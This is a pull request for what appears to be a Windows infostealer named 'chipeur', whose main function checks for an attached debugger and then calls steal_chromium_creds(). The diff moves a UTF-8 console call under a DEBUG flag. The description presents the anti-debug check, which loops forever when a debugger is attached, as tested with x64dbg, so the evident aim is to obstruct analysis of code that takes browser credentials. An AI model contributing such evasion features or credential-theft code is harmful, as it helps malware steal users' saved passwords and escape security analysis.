### PR TITLE
Feature/anti debug flags

### DIFF
--- a/src/chipeur.c
+++ b/src/chipeur.c
@@ -2,7 +2,6 @@
 
 #include <stdio.h>
 #include <stdlib.h>
-#include <string.h>
 #include <wchar.h>
 #include <windows.h>
 
@@ -11,6 +10,11 @@
 #include "obfuscation.h"
 
 int main(void) {
+#ifdef DEBUG
+  // Puts the console in UTF-8
+  // Allows us to print non-ASCII characters for debug
+  SetConsoleOutputCP(CP_UTF8);
+#endif
   // Check if a debugger is attached to the process
   BOOL isDebuggerPresent = FALSE;
   HANDLE hProcess = GetCurrentProcess();
@@ -34,10 +38,6 @@ int main(void) {
         GetLastError());
 #endif
   }
-
-  // Puts the console in UTF-8
-  // Allows us to print non-ASCII characters for debug
-  SetConsoleOutputCP(CP_UTF8);
 
   steal_chromium_creds();
 


### PR DESCRIPTION
I have added an anti-debug checking using Windows dedicated functions. 
It is checking if the process have a debugger attached to it, if so, it enters an infinite loop.

I have tested it using x64dbg but I encourage you to test it on your side to make sure it works correctly.